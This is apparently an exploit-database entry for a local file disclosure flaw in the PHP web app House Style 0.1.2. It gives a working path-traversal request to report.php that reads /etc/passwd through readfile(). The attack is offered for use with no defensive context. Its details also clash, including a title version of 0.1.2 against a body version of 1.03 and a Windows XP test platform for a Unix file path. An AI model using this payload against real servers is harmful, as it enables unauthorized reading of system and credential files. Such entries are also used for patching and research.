House Style 0.1.2 - 'readfile()' Local File Disclosure

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2012-07-12  
date_updated: 2012-07-12  
verified: 1  
codes: OSVDB-83810  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt20000/screen-shot-2012-07-12-at-120340-pm.png  
application_url: http://www.exploit-db.comhousestyle-0.1.2.tar.gz  

raw file: 19768.txt  

# Exploit Title: House Style 0.1.2 => readfile() Local File Disclosure Vulnerability
# Date: 11/07/2012
# Author: GoLd_M
# Vendor or Software Link: http://sourceforge.net/projects/housestyle/
# Version: 1.03
# Category:: readfile() Local File Disclosure Vulnerability2
# Tested on: Xp SP 2
# Ex : 	[House Style 0.1.2]/report.php?file=../../../../../../../../../../../../../../etc/passwd
# See Test :  http://upload.traidnt.net/upfiles/aqz25984.jpg